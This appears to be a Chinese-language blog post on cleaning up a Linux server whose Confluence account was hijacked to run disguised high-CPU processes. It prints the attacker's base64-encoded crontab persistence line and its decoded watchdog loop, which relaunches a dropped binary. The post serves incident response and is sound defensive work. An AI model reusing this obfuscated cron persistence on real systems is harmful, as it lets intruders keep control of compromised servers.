Linux&&confluen&&攻击

问题现象

Tasks: 294 total,   2 running, 292 sleeping,   0 stopped,   0 zombie
Cpu(s): 54.9%us, 28.8%sy,  0.0%ni, 10.5%id,  5.4%wa,  0.2%hi,  0.2%si,  0.0%st
Mem:   4047560k total,  3995788k used,    51772k free,   529652k buffers
Swap: 11857912k total,   640204k used, 11217708k free,   118388k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                                                                                                                  
 9925 confluen  20   0 2376m 2.3g    4 S  198 59.3  13:58.49 * **                                                                                                                                                                                                                                                                                                           
 9951 confluen  20   0   256  184    4 S    5  0.0   0:14.68 TgD?GI                                                                                                                                                    
 9979 confluen  20   0   256  184    4 S    5  0.0   0:14.79 \A?lVv                                                                                                                                                    
 9943 confluen  20   0   256  184    4 S    4  0.0   0:14.78 s??&mw                                                                                                                                                    
 9948 confluen  20   0   256  184    4 S    4  0.0   0:14.62 ^&l?-V                                                                                                                                                    
 9949 confluen  20   0   256  184    4 S    4  0.0   0:14.70 1?br??                                                                                                                                                    
 9950 confluen  20   0   256  184    4 S    4  0.0   0:14.69 d_`fS,                                                                                                                                                    
 9952 confluen  20   0   256  184    4 S    4  0.0   0:14.76 ay?2?_                                                                                                                                                    
 9953 confluen  20   0   256  184    4 S    4  0.0   0:14.68 |bwIoZ                                                                                                                                                    
 9954 confluen  20   0   256  184    4 S    4  0.0   0:14.67 {9?i)g                                                                                                                                                    
 9955 confluen  20   0   256  184    4 S    4  0.0   0:14.71 k?,?(f                                                                                                                                                    

排查思路

物理资源排查

# 硬盘存储资源排查
root@dfq:~# df -hT
# 硬盘节点资源排查
root@dfq:~# df -i
# 内存资源排查
root@dfq:~# free
# cpu资源排查
root@dfq:~# top

进程排查

# 对自己服务器熟悉的话，就用以下两个命令，人工全局排查下
root@dfq:~# ps -ef
root@dfq:~# ps -aux
# 找到了！不正经的程序。
6034     17785  0.0  0.0    256   180 ?        Ss   09:55   0:03 bVD?w5          
6034     17790  3.5  0.0    256   180 ?        S    09:55  20:32 /*?b*+          
6034     17791  0.0  0.0    256   180 ?        S    09:55   0:03 ?0@^??          
6034     17792  0.0  0.0    256   180 ?        S    09:55   0:03 PskV[ 
# 继续查下这是哪个用户的UID
root@dfq:~# cat /etc/passwd | grep 6034
confluence:x:6034:6034:Atlassian Confluence:/home/confluence:/bin/sh
# kill一下
ps -ef | grep ^6034 | cut -c 10-15 | xargs kill -9
# 程序反复出现，kill不能解决问题
# 应该是借助了crontab不断死灰复燃

定时（crontab）任务排查

# 过滤全部用户的全部crontab任务
root@dfq:~# cat /etc/passwd | cut -f 1 -d : |xargs -I {} crontab -l -u {}
# m h  dom mon dow   command
no crontab for jira1
* * * * * echo -n  "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCA5MjgzID4vZGV2L251bGwgMj4mMSA7IHRoZW4gL3Zhci9hdGxhc3NpYW4vYXBwbGljYXRpb24tZGF0YS9jb25mbHVlbmNlL3RlbXAvcXV5cHZmID4vZGV2L251bGwgMj4mMSA7IGZpIDsgZG9uZSApICYgcGlkPSQhIDsgKHNsZWVwIDEwICYmIGtpbGwgLTkgJHBpZCkgJg==" | base64 -d | sh >/dev/null 2>&1
no crontab for vivid
# 果然，confluence在执行定时任务
# base64解密一下，如下
( while : ; do sleep 5 ; if ! kill -0 9283 >/dev/null 2>&1 ; then /var/atlassian/application-data/confluence/temp/quypvf >/dev/null 2>&1 ; fi ; done ) & pid=$! ; (sleep 10 && kill -9 $pid) &

解决方法

由于当前服务器并未安装、使用confluence服务，因此我选择删除confluence用户，清除confluence服务。

# 删除confluence用户的定时任务
root@dfq:~# crontab -l -u confluence
* * * * * echo -n  "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCA5OTIxID4vZGV2L251bGwgMj4mMSA7IHRoZW4gL3Zhci9hdGxhc3NpYW4vYXBwbGljYXRpb24tZGF0YS9jb25mbHVlbmNlL3RlbXAvanF1YmdtID4vZGV2L251bGwgMj4mMSA7IGZpIDsgZG9uZSApICYgcGlkPSQhIDsgKHNsZWVwIDEwICYmIGtpbGwgLTkgJHBpZCkgJg==" | base64 -d | sh >/dev/null 2>&1

root@dfq:~# crontab -r -u confluence
root@dfq:~# crontab -l -u confluence
no crontab for confluence

# 删除confluence用户运行的进程
ps -ef | grep ^6034 | cut -c 10-15 | xargs kill -9

# 删除confluence服务
root@dfq:~# cd /var/
root@dfq:/var# ls
atlassian  backups  bigbluebutton.war  cache  crash  default.css  freeswitch  games  lib  local  lock  log  mail  opt  redis  run  spamassassin  spool  tmp  vmail  www
root@dfq:/var# tar -zcPf atlassian.tar.gz atlassian/*
root@dfq:/var# rm -rf atlassian/

# 删除confluence用户
root@airetalk:~# cat /etc/passwd | grep -ir atlassian
jira:x:6032:6032:Atlassian JIRA:/home/jira:/bin/sh
jira1:x:6033:6033:Atlassian JIRA:/home/jira1:/bin/sh
confluence:x:6034:6034:Atlassian Confluence:/home/confluence:/bin/sh

root@dfq:~# userdel -r jira
root@dfq:~# userdel -r jira1
root@dfq:~# userdel -r confluence
# 服务器安全加固
# 略略略

如果你需要confluence服务，那就打补丁吧
具体情况具体分析呦